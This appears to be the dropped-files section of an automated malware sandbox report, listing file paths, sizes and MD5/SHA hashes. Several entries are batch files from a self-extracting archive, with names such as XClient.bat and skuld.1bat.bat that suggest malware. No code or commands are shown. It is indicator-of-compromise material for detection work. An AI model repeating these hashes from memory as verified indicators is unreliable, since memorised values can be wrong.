10a67860c6dfa85a4cef1e72975afaad

SHA1
6983965392520cc3132af96f1411c436cca0d007

SHA256
0613ecb387f9847fe34d2443f37f971323cd1f513e78ba5c55112354e95fce02

SHA512
0e370abd34d7501a2ed90d4523ca608a8f955ff2c158e3e293379c95338ad0f015529eb457c395eb07d9015f07e15aa374a5ec7e715fbbb1afa965d38ab6f384

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
c6183101067344640861caf31d256dc2

SHA1
3cdc28e4beefd9e21ff34320f549bd73d7134b8e

SHA256
00aa234ec11b86be2e7a89f99a27819c22d32fa5dbd55f041dae12231a8d828b

SHA512
2cd577e14701d29bfeaa46c16f7f82dd80300b325d651dfc5f3dbfaf8ae5965689f729a73c52af837ddece7bcb79caaf63e10777c97e559ee7fb3f4fe941b48c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
0651cd80f634a4718bfcd13fe980c8de

SHA1
d74966b47f7ad3dfb1ba9b7811ec5e5689b58ed6

SHA256
dffe98903f42078fe0746a1710565fdb2aa9ec7bc8e81e86735625b82aba0bad

SHA512
584830f6e87eeedea2abceb4d7144cef8ac860dcb35c4e463a27d82b4584341ee700cd41ec294961c106f00f26de3ab736da55ebd599a36df169c1b8da17e7ed

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
30228723d9a5dbaa0740abcd080517f9

SHA1
32650acce8b708938cd6b266595b8030b865b80a

SHA256
a6f373b993c2f1c5e52f583e49d294d119184820004348d4939ea33d758d5678

SHA512
b0cdfb1722da029634453398d7304b448e0c4db862fcc766d3df10b397d583569f1fbb1e18cd301f6888527f9cdc65a50b26ec56e2800a31da75b074633676c2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d499684c061bc7b75f297f8aada20977

SHA1
c0c9e09c2b0492dfddf3a06bc67faab9deb0326f

SHA256
0f725df6ad1b9802fb7eca279ef0fd51e703c002efc73a95d3f567fea86c0032

SHA512
f24c92d0753dbe75c2b2160f14d60ba66a8584e6337cfa1fe1ab3453c5e10e5b454095e97ef13432ec6440d1b79a7e1fcbf7035909b8ef286129c6511ef956a8

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
fd10659fe99042ea56ee91f21a9f97a3

SHA1
9e06b18aff372fdee4f585e7bd0cd54983ecc23c

SHA256
e66187642ba54294712dc7688234da53e0a41be59252e53d0b4d59f4e6fa39a9

SHA512
e71b847d1553cc0d47ad9ad45d26665d32d47b2906f04afacf6079741ea7d1c5180637a2ea3ad8a4f7936aab11dbf4fadbdcce53bcc3b01563cb3ffae68b24d7

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
9bbe5611470ad0b61b970a591bca127d

SHA1
6c6a8cf317e2599062551428847921000eed78b9

SHA256
49fda20768e894d30b822c4184a8d3530317e0107b1c16a246a1da1cf428a4a5

SHA512
4a7a3961ab365c386aeb2e68db3faefcd864b809699f1c67594cebd4533330ed166d73310f0b8ee03883141ebb982ad98d5abe30c937d6b7929d967740ae90ec

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
73e9c96529a18b783443773a35d0058f

SHA1
500f210871fc728ceb4a2d467dabe396f9b43f66

SHA256
358f25df2e0e28df0447bc842cc0b97570fee0bb3eb83f7beb246ab9f4cd53e8

SHA512
524fef8acd353fa31e16a5b1ede14d342551563e70cead2beb758349a3b6aeba2d0059f12fdf9d93bec784b991a37c31323310f2a137097030a87cd9bce7ddcf

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ea272eacc022a5de153af8247957ae6b

SHA1
68ce7ad33f0bce12c3554363c9a67e872c24c4f6

SHA256
649daf17dcdf4c9e8b67f1f45bf08b891dfd514a8f6b18f662622bb241c341ab

SHA512
4f4bf0eb361580bbb01ef486ddef8979b29b22f857ce361b3dd6ab00e1e53ca41200db14402f47a6f27f17886f46580b166fbe14efa25a3764aa893be5e0a129

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
1f5bdddaf6da9f5a6f6c6d66e44c22a1

SHA1
9473ae088df958245404ef4506bbaa1d3737a844

SHA256
e46d2b65ea97a8ac67df45669a6470ac57fc260779888013363766f42d22369d

SHA512
3aeb4abaeb48c7c9598e170b88bf915140a2b2c6c4d755bea86a8cdce8e1dbf471825b64fefd7a552d244588d12143afc70460716862f8dadf72b34a45bcb57e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
bcc9f1501a30ed99b16d60a5c4011366

SHA1
870194059569c42a3f695745940acbf40488977a

SHA256
eeef82da72722adaf96c4d7e1825a4d0752fdd88af59b459cc64e31ff9a9922b

SHA512
bd7e3e322fd0f681846e3a677e7664a890b82fb95aa19d47f03605dc7e15ea0ad1659d40cb0285322ddf25392a7ecbb37dd006033b5b60376b09f4583de96d3e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\3pl5scb\imagestore.dat

Filesize
1KB

MD5
42a6aea9899f57b125bdeb39ca69ab16

SHA1
3de42306788603af50aba59f9261308eeed4ab18

SHA256
b31ab1748cf0843b1003896eae3cb1b53236740aca0e996de8a51e3ba86e7202

SHA512
528ce72312994e01187982219b34e37737162b1ef94a11fbcefc9ad8e3d576d6da166c3662694712b3f6f68f7f638afe0fd4df570b4ad9bc96920f867afe791e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8ADCJI8Z\favicon[1].ico

Filesize
1KB

MD5
f2a495d85735b9a0ac65deb19c129985

SHA1
f2e22853e5da3e1017d5e1e319eeefe4f622e8c8

SHA256
8bb1d0fa43a17436d59dd546f6f74c76dc44735def7522c22d8031166db8911d

SHA512
6ca6a89de3fa98ca1efcf0b19b8a80420e023f38ed00f4496dc0f821cea23d24fb0992cee58c6d089f093fdefca42b60bb3a0a0b16c97b9862d75b269ae8463b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4DE5.tmp

Filesize
65KB

MD5
ac05d27423a85adc1622c714f2cb6184

SHA1
b0fe2b1abddb97837ea0195be70ab2ff14d43198

SHA256
c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

SHA512
6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\XClient.bat

Filesize
371KB

MD5
3d6307a885e46f705605cff9a4aa7dfc

SHA1
d39dec491bf22e6821856d523b45237bf2bf84ac

SHA256
83cc17a4d11fe7f62858e2ca7cc2c1a4ac12b930ab62812706467a145e9e08b9

SHA512
8735b7045e4bed5927f8791b041641288fb1bf02250c6957fe805381fbcb59f93b3f1f5042bc3f923b4faeb112badcc3614c7249b9df74b085b6881da49552f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\cracker.bat

Filesize
526B

MD5
762a5a724e82c36c9cd085168127e595

SHA1
1a77588ac5f3e05fbb46a19210f6df4d8827d96b

SHA256
3d0713e679a29c645bda26e64521ffdecf9dcde327e52f434aaf3e2bb42eb4e8

SHA512
0f17df60d86cd48f7c71c36b25b3177bb7836f0311ffe1c65d2d663aee526d0b8152d15ce95f7523e3012e1e1d7b1ce45aef3bc9e57e345d0a8a58ece3ede23b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\skuld.1bat.bat

Filesize
12.8MB

MD5
a196e6ea26ed28f8e84e7db561e35b29

SHA1
c69f8dfdaa8336ff39696eb5b34601d14242f2bb

SHA256
c97de10ec62f0461f1ced148de89ab7cf6895c1581c9ab3c4aee63908e0e3143

SHA512
500543503c9aab318a624d7017e729493f36801818368f19b8fe72c4ad6d167aff3a370b83de2a817ffc629ae60e69e8d2468806f10391062317fe98f45bb4ee

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\taskkiller.bat

Filesize
54B

MD5
18ef03e1045b224a70d9afdf8247a241

SHA1
117b3959ded227b5cf0015229db0386f6479df70

SHA256
daf87ae302bcd7c7a65f6db2b93216116de0621169f724f564812a6a8614f33d

SHA512
2ef552283ed844801dc6b7a2ec143e1e52f77b6f7ee2516bb70b3c8db6592eaef9e435f063bbb94019ac135c2e37ccfcb9db8f926a7358c3590b3fc9c63beafd

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\website.bat

Filesize
74B

MD5
b3be17a14609d812602af67da8b7acc2

SHA1
e1fcc3e3989ee6846694eba252622a336ce63795

SHA256
f6cb1a4b508b1650cc1eaa607f545e50967157eef4f676de39836f2806d63b81

SHA512
780a624a79bb3b293d83017595f709dd9fdc9e645f9c8bc5102aacaaad89a622e6a0dae9ea30fc3679378f6fe4afe34937f4909594c32351ee831917e8b0c1a7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RarSFX0\wompwomp.bat

Filesize
340B

MD5
6943c2eb7e78b8b8cb8171b940de20f2

SHA1
e428c6dc0ffc17ab70178765e0bcb23dc0c12b8a

SHA256
eb79d4bf846dfbd540085f0972658373f26709f281dfb88ad461f9df03d83095

SHA512
1d628f3c5ac6e41ed14cc0069bde0278248e32c77e2e111bc842a71ba62d52913b47fb29402ce79b3d0880b6b5763b0d9906d6fb65bcfdf33103aefa0044552b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4DE6.tmp

Filesize
171KB

MD5
9c0c641c06238516f27941aa1166d427

SHA1
64cd549fb8cf014fcd9312aa7a5b023847b6c977

SHA256
4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

SHA512
936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4EE5.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
5f0438e1f059cca8642a4adce5095966

SHA1
8edbc5dd5416577777506b5b493e948b098fd95a

SHA256
eb54e6f0fc351e7b32ece783eed204fb575fef280dc294e59671f90ef8dd513e

SHA512
bb4f6e1cc2d65904c218fd89be1480db3b0002c0466cd086dcd6b0f895775cd9021a6fe4f82161d81df0bccaefd6e59c7ac50c93e6e945a6dea0323f82fb4661

Download Submit